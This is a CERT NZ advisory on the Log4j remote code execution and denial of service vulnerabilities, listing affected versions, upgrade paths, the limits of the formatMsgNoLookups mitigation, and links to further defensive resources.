12:00pm, 20 December 2021
TLP Rating:
Log4j RCE 0-day actively exploited
Updated: 12:00pm, 20 December 2021 to provide the latest information on version upgrades, and a new denial of service vulnerability in Log4j
Updated: 4.10pm, 15 December 2021 to provide the latest information on version upgrades, mitigations and a new denial of service vulnerability in Log4j.
Updated: 3.30pm, 13 December 2021 to provide link to list of related software's vulnerablity status.
Updated: 10.30am, 11 December 2021 to provide the latest information on version upgrades to protect from this vulnerability.
The widely-used java logging library, Log4j, has an unauthenticated remote code execution (RCE) and denial of service vulnerability if a user-controlled string is logged. This could allow the attacker full control of the affected server or allow an attacker to conduct a denial of service attack.
Reports from online users show that this is being actively exploited in the wild and that proof-of-concept code has been published.
What's happening
Systems affected
Systems and services that use the Java logging library, Apache Log4j between versions 2.0 and 2.15.0 (inclusive) are affected by the remote code execution vulnerability.
Those running Apache Log4j between versions 2.0 and 2.16 (inclusive) are affected by a denial of service vulnerability.
For more information on the specific configurations see the Apache advisory in the More Information section below.
This includes many applications and services written in Java.
What to look for
How to tell if you're at risk
Apache Log4j versions between version 2.0 and 2.15.0 (inclusive) are vulnerable to the remote code execution vulnerability.
Apache Log4j versions between version 2.0 and 2.16.0 (inclusive) are vulnerable to a denial of service vulnerability.
For more information on the specific configurations see the Apache advisory in the More Information section below.
How to tell if you're affected
List of software and its vulnerablity status helpfully provided by NCSC-NL
Log4j overview of related software External Link
The log files for any services using affected Log4j versions will contain user-controlled strings.
What to do
Prevention
Upgrade your Log4j versions to the latest version. The current latest Log4j version is 2.17.1 which fixes both vulnerabilities.
Note: this upgrade requires Java 8 or greater. If you cannot upgrade to Java 8 and are running Java 7, Apache have released Log4j 2.12.2
Mitigation
Previously it was reported that setting log4j2.formatMsgNoLookups to true would mitigate the vulnerability but this is no longer this case under all circumstances. This mitigation may still help but is no longer sufficient.
Note: this mitigation does not prevent denial of service and will only work for versions 2.10 and above. This mitigation may impact the behaviour of your system’s logging if it relies on Lookups for message formatting.
More information
Apache's Log4ji advisory (External Link) External Link
Tech Solvency incident overview and reference guide (External Link) External Link
NCSC-NL's list of software and vulnerability status (External Link) External Link
LunaSec's blog on Log4j (External Link) External Link
GitHub's potential rules that allow detection of exploit attempts (External Link) External Link
CVE for Log4j RCE vulnerability (External Link) External Link
CVE for Log4j DOS vulnerability (External Link) External Link
CVE for Log4j 2.16.0 DOS vulnerability (External Link) External Link
Mitigating Log4Shell and Other Log4j-Related Vulnerabilities | CISA External Link (External Link)
If you require more information or further support, submit a report on our website or contact us on 0800 CERTNZ.
For media enquiries, email our media desk at certmedia@cert.govt.nz or call on 021 854 384
How helpful was this page?
This site is protected by reCAPTCHA and the Google Privacy Policy External Link and Terms of Service External Link apply.